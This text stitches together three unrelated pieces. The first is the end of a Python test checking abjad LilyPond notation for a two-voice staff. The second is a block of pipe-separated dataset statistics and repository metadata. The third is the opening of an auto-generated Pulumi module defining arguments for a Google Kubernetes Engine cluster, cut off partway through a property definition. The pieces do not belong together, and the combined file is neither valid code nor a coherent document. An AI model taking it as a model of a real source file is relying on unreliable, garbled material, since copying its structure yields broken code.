assert abjad.lilypond(staff) == abjad.String.normalize(
r"""
\new Staff
<<
\new Voice
{
\time 4/4
\voiceOne
b'8
c''8
e''2
g''4
b'8
c''8
e''2
r4
b'8
c''8
e''2
r4
b'8
c''8
e''2
r4
b'8
c''8
e''2
r4
b'8
c''8
r2.
b'8
r2..
R1
}
\new Voice
{
\time 4/4
\voiceTwo
R1
R1
\times 2/3
{
r1
c'2
}
\times 2/3
{
e'2
r2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
\times 2/3
{
e'2
d'2
c'2
}
}
>>
"""
)
| 24.288674
| 78
| 0.336736
| 3,404
| 35,170
| 3.339013
| 0.042303
| 0.051909
| 0.028506
| 0.088686
| 0.838466
| 0.793507
| 0.771248
| 0.745381
| 0.704469
| 0.652736
| 0
| 0.077752
| 0.577993
| 35,170
| 1,447
| 79
| 24.30546
| 0.688047
| 0
| 0
| 0.548148
| 0
| 0.009877
| 0.057372
| 0
| 0
| 0
| 0
| 0
| 0.125926
| 1
| 0.049383
| false
| 0
| 0.007407
| 0
| 0.05679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c934d2baf5e9d283d92a39c0ee6e12a4247eb8e
| 220,298
|
py
|
Python
|
sdk/python/pulumi_gcp/container/cluster.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/container/cluster.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/container/cluster.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ClusterArgs', 'Cluster']
@pulumi.input_type
class ClusterArgs:
def __init__(__self__, *,
addons_config: Optional[pulumi.Input['ClusterAddonsConfigArgs']] = None,
authenticator_groups_config: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']] = None,
cluster_autoscaling: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']] = None,
cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
cluster_telemetry: Optional[pulumi.Input['ClusterClusterTelemetryArgs']] = None,
confidential_nodes: Optional[pulumi.Input['ClusterConfidentialNodesArgs']] = None,
database_encryption: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']] = None,
datapath_provider: Optional[pulumi.Input[str]] = None,
default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
default_snat_status: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
dns_config: Optional[pulumi.Input['ClusterDnsConfigArgs']] = None,
enable_autopilot: Optional[pulumi.Input[bool]] = None,
enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
enable_tpu: Optional[pulumi.Input[bool]] = None,
identity_service_config: Optional[pulumi.Input['ClusterIdentityServiceConfigArgs']] = None,
initial_node_count: Optional[pulumi.Input[int]] = None,
ip_allocation_policy: Optional[pulumi.Input['ClusterIpAllocationPolicyArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input['ClusterLoggingConfigArgs']] = None,
logging_service: Optional[pulumi.Input[str]] = None,
maintenance_policy: Optional[pulumi.Input['ClusterMaintenancePolicyArgs']] = None,
master_auth: Optional[pulumi.Input['ClusterMasterAuthArgs']] = None,
master_authorized_networks_config: Optional[pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs']] = None,
min_master_version: Optional[pulumi.Input[str]] = None,
monitoring_config: Optional[pulumi.Input['ClusterMonitoringConfigArgs']] = None,
monitoring_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_policy: Optional[pulumi.Input['ClusterNetworkPolicyArgs']] = None,
networking_mode: Optional[pulumi.Input[str]] = None,
node_config: Optional[pulumi.Input['ClusterNodeConfigArgs']] = None,
node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_pools: Optional[pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]]] = None,
node_version: Optional[pulumi.Input[str]] = None,
notification_config: Optional[pulumi.Input['ClusterNotificationConfigArgs']] = None,
pod_security_policy_config: Optional[pulumi.Input['ClusterPodSecurityPolicyConfigArgs']] = None,
private_cluster_config: Optional[pulumi.Input['ClusterPrivateClusterConfigArgs']] = None,
private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
release_channel: Optional[pulumi.Input['ClusterReleaseChannelArgs']] = None,
remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_usage_export_config: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
vertical_pod_autoscaling: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']] = None,
workload_identity_config: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']] = None):
"""
The set of arguments for constructing a Cluster resource.
:param pulumi.Input['ClusterAddonsConfigArgs'] addons_config: The configuration for addons supported by GKE.
Structure is documented below.
:param pulumi.Input['ClusterAuthenticatorGroupsConfigArgs'] authenticator_groups_config: Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
:param pulumi.Input['ClusterClusterAutoscalingArgs'] cluster_autoscaling: Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
:param pulumi.Input[str] cluster_ipv4_cidr: The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
:param pulumi.Input['ClusterClusterTelemetryArgs'] cluster_telemetry: Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
:param pulumi.Input['ClusterConfidentialNodesArgs'] confidential_nodes: Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
:param pulumi.Input['ClusterDatabaseEncryptionArgs'] database_encryption: Structure is documented below.
:param pulumi.Input[str] datapath_provider: The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
:param pulumi.Input[int] default_max_pods_per_node: The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
:param pulumi.Input['ClusterDefaultSnatStatusArgs'] default_snat_status: [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
:param pulumi.Input[str] description: Description of the cluster.
:param pulumi.Input['ClusterDnsConfigArgs'] dns_config: Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
:param pulumi.Input[bool] enable_autopilot: Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
:param pulumi.Input[bool] enable_binary_authorization: Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
:param pulumi.Input[bool] enable_intranode_visibility: Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
:param pulumi.Input[bool] enable_kubernetes_alpha: Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
:param pulumi.Input[bool] enable_l4_ilb_subsetting: Whether L4ILB Subsetting is enabled for this cluster.
:param pulumi.Input[bool] enable_legacy_abac: Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
:param pulumi.Input[bool] enable_shielded_nodes: Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
:param pulumi.Input[bool] enable_tpu: Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
:param pulumi.Input['ClusterIdentityServiceConfigArgs'] identity_service_config: . Structure is documented below.
:param pulumi.Input[int] initial_node_count: The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
:param pulumi.Input['ClusterIpAllocationPolicyArgs'] ip_allocation_policy: Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
:param pulumi.Input[str] location: The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
:param pulumi.Input['ClusterLoggingConfigArgs'] logging_config: Logging configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] logging_service: The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
:param pulumi.Input['ClusterMaintenancePolicyArgs'] maintenance_policy: The maintenance policy to use for the cluster. Structure is
documented below.
:param pulumi.Input['ClusterMasterAuthArgs'] master_auth: The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
:param pulumi.Input['ClusterMasterAuthorizedNetworksConfigArgs'] master_authorized_networks_config: The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
:param pulumi.Input[str] min_master_version: The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
:param pulumi.Input['ClusterMonitoringConfigArgs'] monitoring_config: Monitoring configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] monitoring_service: The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
:param pulumi.Input[str] name: The name of the cluster, unique within the project and
location.
:param pulumi.Input[str] network: The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
:param pulumi.Input['ClusterNetworkPolicyArgs'] network_policy: Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
:param pulumi.Input[str] networking_mode: Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
:param pulumi.Input['ClusterNodeConfigArgs'] node_config: Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] node_locations: The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
:param pulumi.Input[Sequence[pulumi.Input['ClusterNodePoolArgs']]] node_pools: List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
:param pulumi.Input[str] node_version: The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
:param pulumi.Input['ClusterNotificationConfigArgs'] notification_config: Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
:param pulumi.Input['ClusterPodSecurityPolicyConfigArgs'] pod_security_policy_config: ) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
:param pulumi.Input['ClusterPrivateClusterConfigArgs'] private_cluster_config: Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
:param pulumi.Input[str] private_ipv6_google_access: The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
:param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
:param pulumi.Input['ClusterReleaseChannelArgs'] release_channel: Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
:param pulumi.Input[bool] remove_default_node_pool: If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_labels: The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
:param pulumi.Input['ClusterResourceUsageExportConfigArgs'] resource_usage_export_config: Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
:param pulumi.Input[str] subnetwork: The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
:param pulumi.Input['ClusterVerticalPodAutoscalingArgs'] vertical_pod_autoscaling: Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
:param pulumi.Input['ClusterWorkloadIdentityConfigArgs'] workload_identity_config: Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
if addons_config is not None:
pulumi.set(__self__, "addons_config", addons_config)
if authenticator_groups_config is not None:
pulumi.set(__self__, "authenticator_groups_config", authenticator_groups_config)
if cluster_autoscaling is not None:
pulumi.set(__self__, "cluster_autoscaling", cluster_autoscaling)
if cluster_ipv4_cidr is not None:
pulumi.set(__self__, "cluster_ipv4_cidr", cluster_ipv4_cidr)
if cluster_telemetry is not None:
pulumi.set(__self__, "cluster_telemetry", cluster_telemetry)
if confidential_nodes is not None:
pulumi.set(__self__, "confidential_nodes", confidential_nodes)
if database_encryption is not None:
pulumi.set(__self__, "database_encryption", database_encryption)
if datapath_provider is not None:
pulumi.set(__self__, "datapath_provider", datapath_provider)
if default_max_pods_per_node is not None:
pulumi.set(__self__, "default_max_pods_per_node", default_max_pods_per_node)
if default_snat_status is not None:
pulumi.set(__self__, "default_snat_status", default_snat_status)
if description is not None:
pulumi.set(__self__, "description", description)
if dns_config is not None:
pulumi.set(__self__, "dns_config", dns_config)
if enable_autopilot is not None:
pulumi.set(__self__, "enable_autopilot", enable_autopilot)
if enable_binary_authorization is not None:
pulumi.set(__self__, "enable_binary_authorization", enable_binary_authorization)
if enable_intranode_visibility is not None:
pulumi.set(__self__, "enable_intranode_visibility", enable_intranode_visibility)
if enable_kubernetes_alpha is not None:
pulumi.set(__self__, "enable_kubernetes_alpha", enable_kubernetes_alpha)
if enable_l4_ilb_subsetting is not None:
pulumi.set(__self__, "enable_l4_ilb_subsetting", enable_l4_ilb_subsetting)
if enable_legacy_abac is not None:
pulumi.set(__self__, "enable_legacy_abac", enable_legacy_abac)
if enable_shielded_nodes is not None:
pulumi.set(__self__, "enable_shielded_nodes", enable_shielded_nodes)
if enable_tpu is not None:
pulumi.set(__self__, "enable_tpu", enable_tpu)
if identity_service_config is not None:
pulumi.set(__self__, "identity_service_config", identity_service_config)
if initial_node_count is not None:
pulumi.set(__self__, "initial_node_count", initial_node_count)
if ip_allocation_policy is not None:
pulumi.set(__self__, "ip_allocation_policy", ip_allocation_policy)
if location is not None:
pulumi.set(__self__, "location", location)
if logging_config is not None:
pulumi.set(__self__, "logging_config", logging_config)
if logging_service is not None:
pulumi.set(__self__, "logging_service", logging_service)
if maintenance_policy is not None:
pulumi.set(__self__, "maintenance_policy", maintenance_policy)
if master_auth is not None:
pulumi.set(__self__, "master_auth", master_auth)
if master_authorized_networks_config is not None:
pulumi.set(__self__, "master_authorized_networks_config", master_authorized_networks_config)
if min_master_version is not None:
pulumi.set(__self__, "min_master_version", min_master_version)
if monitoring_config is not None:
pulumi.set(__self__, "monitoring_config", monitoring_config)
if monitoring_service is not None:
pulumi.set(__self__, "monitoring_service", monitoring_service)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if network_policy is not None:
pulumi.set(__self__, "network_policy", network_policy)
if networking_mode is not None:
pulumi.set(__self__, "networking_mode", networking_mode)
if node_config is not None:
pulumi.set(__self__, "node_config", node_config)
if node_locations is not None:
pulumi.set(__self__, "node_locations", node_locations)
if node_pools is not None:
pulumi.set(__self__, "node_pools", node_pools)
if node_version is not None:
pulumi.set(__self__, "node_version", node_version)
if notification_config is not None:
pulumi.set(__self__, "notification_config", notification_config)
if pod_security_policy_config is not None:
pulumi.set(__self__, "pod_security_policy_config", pod_security_policy_config)
if private_cluster_config is not None:
pulumi.set(__self__, "private_cluster_config", private_cluster_config)
if private_ipv6_google_access is not None:
pulumi.set(__self__, "private_ipv6_google_access", private_ipv6_google_access)
if project is not None:
pulumi.set(__self__, "project", project)
if release_channel is not None:
pulumi.set(__self__, "release_channel", release_channel)
if remove_default_node_pool is not None:
pulumi.set(__self__, "remove_default_node_pool", remove_default_node_pool)
if resource_labels is not None:
pulumi.set(__self__, "resource_labels", resource_labels)
if resource_usage_export_config is not None:
pulumi.set(__self__, "resource_usage_export_config", resource_usage_export_config)
if subnetwork is not None:
pulumi.set(__self__, "subnetwork", subnetwork)
if vertical_pod_autoscaling is not None:
pulumi.set(__self__, "vertical_pod_autoscaling", vertical_pod_autoscaling)
if workload_identity_config is not None:
pulumi.set(__self__, "workload_identity_config", workload_identity_config)
@property
@pulumi.getter(name="addonsConfig")
def addons_config(self) -> Optional[pulumi.Input['ClusterAddonsConfigArgs']]:
"""
The configuration for addons supported by GKE.
Structure is documented below.
"""
return pulumi.get(self, "addons_config")
@addons_config.setter
def addons_config(self, value: Optional[pulumi.Input['ClusterAddonsConfigArgs']]):
pulumi.set(self, "addons_config", value)
@property
@pulumi.getter(name="authenticatorGroupsConfig")
def authenticator_groups_config(self) -> Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]:
"""
Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
"""
return pulumi.get(self, "authenticator_groups_config")
@authenticator_groups_config.setter
def authenticator_groups_config(self, value: Optional[pulumi.Input['ClusterAuthenticatorGroupsConfigArgs']]):
pulumi.set(self, "authenticator_groups_config", value)
@property
@pulumi.getter(name="clusterAutoscaling")
def cluster_autoscaling(self) -> Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]:
"""
Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
"""
return pulumi.get(self, "cluster_autoscaling")
@cluster_autoscaling.setter
def cluster_autoscaling(self, value: Optional[pulumi.Input['ClusterClusterAutoscalingArgs']]):
pulumi.set(self, "cluster_autoscaling", value)
@property
@pulumi.getter(name="clusterIpv4Cidr")
def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:
"""
The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
"""
return pulumi.get(self, "cluster_ipv4_cidr")
@cluster_ipv4_cidr.setter
def cluster_ipv4_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_ipv4_cidr", value)
@property
@pulumi.getter(name="clusterTelemetry")
def cluster_telemetry(self) -> Optional[pulumi.Input['ClusterClusterTelemetryArgs']]:
"""
Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
"""
return pulumi.get(self, "cluster_telemetry")
@cluster_telemetry.setter
def cluster_telemetry(self, value: Optional[pulumi.Input['ClusterClusterTelemetryArgs']]):
pulumi.set(self, "cluster_telemetry", value)
@property
@pulumi.getter(name="confidentialNodes")
def confidential_nodes(self) -> Optional[pulumi.Input['ClusterConfidentialNodesArgs']]:
"""
Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
"""
return pulumi.get(self, "confidential_nodes")
@confidential_nodes.setter
def confidential_nodes(self, value: Optional[pulumi.Input['ClusterConfidentialNodesArgs']]):
pulumi.set(self, "confidential_nodes", value)
@property
@pulumi.getter(name="databaseEncryption")
def database_encryption(self) -> Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]:
"""
Structure is documented below.
"""
return pulumi.get(self, "database_encryption")
@database_encryption.setter
def database_encryption(self, value: Optional[pulumi.Input['ClusterDatabaseEncryptionArgs']]):
pulumi.set(self, "database_encryption", value)
@property
@pulumi.getter(name="datapathProvider")
def datapath_provider(self) -> Optional[pulumi.Input[str]]:
"""
The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
"""
return pulumi.get(self, "datapath_provider")
@datapath_provider.setter
def datapath_provider(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "datapath_provider", value)
@property
@pulumi.getter(name="defaultMaxPodsPerNode")
def default_max_pods_per_node(self) -> Optional[pulumi.Input[int]]:
"""
The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
"""
return pulumi.get(self, "default_max_pods_per_node")
@default_max_pods_per_node.setter
def default_max_pods_per_node(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_max_pods_per_node", value)
@property
@pulumi.getter(name="defaultSnatStatus")
def default_snat_status(self) -> Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]:
"""
[GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
"""
return pulumi.get(self, "default_snat_status")
@default_snat_status.setter
def default_snat_status(self, value: Optional[pulumi.Input['ClusterDefaultSnatStatusArgs']]):
pulumi.set(self, "default_snat_status", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the cluster.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="dnsConfig")
def dns_config(self) -> Optional[pulumi.Input['ClusterDnsConfigArgs']]:
"""
Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
"""
return pulumi.get(self, "dns_config")
@dns_config.setter
def dns_config(self, value: Optional[pulumi.Input['ClusterDnsConfigArgs']]):
pulumi.set(self, "dns_config", value)
@property
@pulumi.getter(name="enableAutopilot")
def enable_autopilot(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
"""
return pulumi.get(self, "enable_autopilot")
@enable_autopilot.setter
def enable_autopilot(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_autopilot", value)
@property
@pulumi.getter(name="enableBinaryAuthorization")
def enable_binary_authorization(self) -> Optional[pulumi.Input[bool]]:
"""
Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
"""
return pulumi.get(self, "enable_binary_authorization")
@enable_binary_authorization.setter
def enable_binary_authorization(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_binary_authorization", value)
@property
@pulumi.getter(name="enableIntranodeVisibility")
def enable_intranode_visibility(self) -> Optional[pulumi.Input[bool]]:
"""
Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
"""
return pulumi.get(self, "enable_intranode_visibility")
@enable_intranode_visibility.setter
def enable_intranode_visibility(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_intranode_visibility", value)
@property
@pulumi.getter(name="enableKubernetesAlpha")
def enable_kubernetes_alpha(self) -> Optional[pulumi.Input[bool]]:
"""
Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
"""
return pulumi.get(self, "enable_kubernetes_alpha")
@enable_kubernetes_alpha.setter
def enable_kubernetes_alpha(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_kubernetes_alpha", value)
@property
@pulumi.getter(name="enableL4IlbSubsetting")
def enable_l4_ilb_subsetting(self) -> Optional[pulumi.Input[bool]]:
"""
Whether L4ILB Subsetting is enabled for this cluster.
"""
return pulumi.get(self, "enable_l4_ilb_subsetting")
@enable_l4_ilb_subsetting.setter
def enable_l4_ilb_subsetting(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_l4_ilb_subsetting", value)
@property
@pulumi.getter(name="enableLegacyAbac")
def enable_legacy_abac(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
"""
return pulumi.get(self, "enable_legacy_abac")
@enable_legacy_abac.setter
def enable_legacy_abac(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_legacy_abac", value)
@property
@pulumi.getter(name="enableShieldedNodes")
